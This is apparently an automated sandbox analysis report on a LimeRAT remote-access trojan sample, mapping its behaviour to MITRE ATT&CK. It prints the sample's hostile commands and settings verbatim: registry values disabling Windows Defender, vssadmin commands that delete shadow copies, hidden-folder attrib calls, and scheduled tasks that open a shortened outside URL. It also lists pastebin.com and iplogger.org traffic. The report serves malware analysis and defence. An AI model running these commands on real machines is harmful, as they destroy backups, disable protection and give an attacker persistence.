Malware Analysis Report

2024-09-11 10:21

Sample ID 240619-rvffgasbqh
Target Client.exe
SHA256 ebf854c44cf0407faa99b0a60ced1b4805c33249cbc0828554cf1aef7b1c1c79
Tags
limerat defense_evasion evasion execution impact persistence ransomware rat trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

ebf854c44cf0407faa99b0a60ced1b4805c33249cbc0828554cf1aef7b1c1c79

Threat Level: Known bad

The file Client.exe was found to be: Known bad.

Malicious Activity Summary

limerat defense_evasion evasion execution impact persistence ransomware rat trojan

Modifies Windows Defender Real-time Protection settings

Contains code to disable Windows Defender

Modifies security service

Modifies WinLogon for persistence

LimeRAT

Limerat family

Deletes shadow copies

Executes dropped EXE

Checks computer location settings

Enumerates connected drives

Legitimate hosting services abused for malware hosting/C2

Hide Artifacts: Hidden Files and Directories

Enumerates physical storage devices

Unsigned PE

Views/modifies file attributes

Scheduled Task/Job: Scheduled Task

Disables Windows logging functionality

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Uses Task Scheduler COM API

Uses Volume Shadow Copy service COM API

Interacts with shadow copies

Suspicious use of WriteProcessMemory

MITRE ATT&CK Matrix V13

Initial Access
TA0001
Execution
TA0002
Windows Management Instrumentation
T1047
Scheduled Task/Job
T1053
Scheduled Task
T1053.005
Persistence
TA0003
Boot or Logon Autostart Execution
T1547
Winlogon Helper DLL
T1547.004
Create or Modify System Process
T1543
Windows Service
T1543.003
Scheduled Task/Job
T1053
Scheduled Task
T1053.005
Privilege Escalation
TA0004
Boot or Logon Autostart Execution
T1547
Winlogon Helper DLL
T1547.004
Create or Modify System Process
T1543
Windows Service
T1543.003
Scheduled Task/Job
T1053
Scheduled Task
T1053.005
Defense Evasion
TA0005
Modify Registry
T1112
Impair Defenses
T1562
Disable or Modify Tools
T1562.001
Indicator Removal
T1070
File Deletion
T1070.004
Hide Artifacts
T1564
Hidden Files and Directories
T1564.001
Direct Volume Access
T1006
Credential Access
TA0006
Discovery
TA0007
Query Registry
T1012
System Information Discovery
T1082
Peripheral Device Discovery
T1120
Lateral Movement
TA0008
Collection
TA0009
Exfiltration
TA0010
Command and Control
TA0011
Web Service
T1102
Impact
TA0040
Inhibit System Recovery
T1490
Resource Development
TA0042
Reconnaissance
TA0043

Analysis: static1

Detonation Overview

Reported

2024-06-19 14:30

Signatures

Contains code to disable Windows Defender

Description Indicator Process Target
N/A N/A N/A N/A

Limerat family

limerat

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-19 14:30

Reported

2024-06-19 14:32

Platform

win10v2004-20240611-en

Max time kernel

126s

Max time network

127s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Client.exe"

Signatures

Contains code to disable Windows Defender

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

LimeRAT

rat limerat

Modifies WinLogon for persistence

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\shell = "explorer.exe,\"C:\\Users\\Admin\\Branding\\svchost.exe\"" C:\Users\Admin\Branding\svchost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\shell = "explorer.exe,\"C:\\Users\\Admin\\Branding\\svchost.exe\"" C:\Users\Admin\AppData\Local\Temp\Client.exe N/A

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\Client.exe N/A

Modifies security service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Start = "4" C:\Users\Admin\AppData\Local\Temp\Client.exe N/A

Deletes shadow copies

ransomware defense_evasion impact execution

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Client.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\Branding\svchost.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\h: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\e: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\g: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\F: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\h: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\D: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\F: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\e: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\g: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\vssadmin.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Hide Artifacts: Hidden Files and Directories

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\cmd.exe N/A
N/A N/A C:\Windows\SYSTEM32\cmd.exe N/A

Enumerates physical storage devices

Disables Windows logging functionality

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\Branding\svchost.exe N/A
N/A N/A C:\Users\Admin\Branding\svchost.exe N/A
N/A N/A C:\Users\Admin\Branding\svchost.exe N/A
N/A N/A C:\Users\Admin\Branding\svchost.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Branding\svchost.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1932 wrote to memory of 1880 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 1932 wrote to memory of 1880 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 1880 wrote to memory of 948 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\attrib.exe
PID 1880 wrote to memory of 948 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\attrib.exe
PID 1880 wrote to memory of 3400 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\attrib.exe
PID 1880 wrote to memory of 3400 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\attrib.exe
PID 1932 wrote to memory of 4556 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1932 wrote to memory of 4556 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1932 wrote to memory of 3600 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 1932 wrote to memory of 3600 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 1932 wrote to memory of 2480 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 1932 wrote to memory of 2480 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 1932 wrote to memory of 952 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 1932 wrote to memory of 952 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 1932 wrote to memory of 4284 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 1932 wrote to memory of 4284 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 1932 wrote to memory of 1184 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 1932 wrote to memory of 1184 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 1932 wrote to memory of 4444 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 1932 wrote to memory of 4444 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 1932 wrote to memory of 4396 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 1932 wrote to memory of 4396 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 1932 wrote to memory of 628 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 1932 wrote to memory of 628 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 1932 wrote to memory of 1200 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 1932 wrote to memory of 1200 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 1932 wrote to memory of 2836 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 1932 wrote to memory of 2836 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 1932 wrote to memory of 4884 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 1932 wrote to memory of 4884 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 1932 wrote to memory of 1960 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 1932 wrote to memory of 1960 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 1932 wrote to memory of 4588 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 1932 wrote to memory of 4588 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 2480 wrote to memory of 1032 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2480 wrote to memory of 1032 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 952 wrote to memory of 804 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 952 wrote to memory of 804 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 1184 wrote to memory of 3900 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 1184 wrote to memory of 3900 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2836 wrote to memory of 3172 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2836 wrote to memory of 3172 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 4396 wrote to memory of 1292 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 4396 wrote to memory of 1292 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 4884 wrote to memory of 3968 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 4884 wrote to memory of 3968 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 4588 wrote to memory of 2160 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 4588 wrote to memory of 2160 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 1960 wrote to memory of 5036 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 1960 wrote to memory of 5036 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 3600 wrote to memory of 2312 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 3600 wrote to memory of 2312 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 4444 wrote to memory of 4984 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 4444 wrote to memory of 4984 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 1200 wrote to memory of 4068 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 1200 wrote to memory of 4068 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 628 wrote to memory of 3304 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 628 wrote to memory of 3304 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 1932 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\schtasks.exe
PID 1932 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\schtasks.exe
PID 1932 wrote to memory of 2268 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\schtasks.exe
PID 1932 wrote to memory of 2268 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\schtasks.exe
PID 1932 wrote to memory of 4456 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\schtasks.exe
PID 1932 wrote to memory of 4456 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\schtasks.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Client.exe

"C:\Users\Admin\AppData\Local\Temp\Client.exe"

C:\Windows\SYSTEM32\cmd.exe

cmd /c attrib +H +S "C:\Users\Admin\\Branding" & attrib +H +S "C:\Users\Admin\\Branding\*" /S /D

C:\Windows\system32\attrib.exe

attrib +H +S "C:\Users\Admin\\Branding"

C:\Windows\system32\attrib.exe

attrib +H +S "C:\Users\Admin\\Branding\*" /S /D

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" Get-MpPreference -verbose

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin Delete Shadows /all /quiet

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadow /for=c: /on=c: /maxsize=401MB

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded

C:\Windows\SYSTEM32\cmd.exe

cmd /c Vssadmin delete shadowstorage /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin resize shadow /for=c: /on=c: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssadmin.exe

Vssadmin delete shadowstorage /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin Delete Shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded

C:\Windows\SYSTEM32\schtasks.exe

schtasks /create /f /st "11:10" /sc daily /mo "5" /tn "NUC" /tr "'explorer'https://gsurl.be/kXFX"

C:\Windows\SYSTEM32\schtasks.exe

schtasks /create /f /st "21:41" /sc daily /mo "5" /tn "NUC" /tr "'explorer'https://gsurl.be/kXFX"

C:\Windows\SYSTEM32\schtasks.exe

schtasks /create /f /st "03:40" /sc daily /mo "2" /tn "NUC" /tr "'explorer'https://gsurl.be/kXFX"

C:\Windows\SYSTEM32\schtasks.exe

schtasks /create /f /st "06:27" /sc weekly /mo "2" /d "Wed" /tn "NUC" /tr "'explorer'https://gsurl.be/kXFX"

C:\Windows\SYSTEM32\schtasks.exe

schtasks /create /f /st "17:29" /sc monthly /m "nov" /tn "NUC" /tr "'explorer'https://gsurl.be/kXFX"

C:\Users\Admin\Branding\svchost.exe

"C:\Users\Admin\Branding\svchost.exe"

C:\Windows\SYSTEM32\cmd.exe

cmd /c attrib +H +S "C:\Users\Admin\\Branding" & attrib +H +S "C:\Users\Admin\\Branding\*" /S /D

C:\Windows\system32\attrib.exe

attrib +H +S "C:\Users\Admin\\Branding"

C:\Windows\system32\attrib.exe

attrib +H +S "C:\Users\Admin\\Branding\*" /S /D

Network

Country Destination Domain Proto
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 97.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 iplogger.org udp
US 104.21.4.208:443 iplogger.org tcp
US 8.8.8.8:53 ftp.encompossoftware.com udp
US 8.8.8.8:53 208.4.21.104.in-addr.arpa udp
US 64.40.144.30:21 ftp.encompossoftware.com tcp
US 64.40.144.30:34287 ftp.encompossoftware.com tcp
US 8.8.8.8:53 30.144.40.64.in-addr.arpa udp
US 52.182.143.211:443 tcp
US 8.8.8.8:53 pastebin.com udp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 8.8.8.8:53 www.example.com udp
US 93.184.215.14:443 www.example.com tcp
US 8.8.8.8:53 24.19.67.172.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 8.8.8.8:53 14.215.184.93.in-addr.arpa udp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 8.8.8.8:53 107.12.20.2.in-addr.arpa udp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
PL 93.184.221.240:80 tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
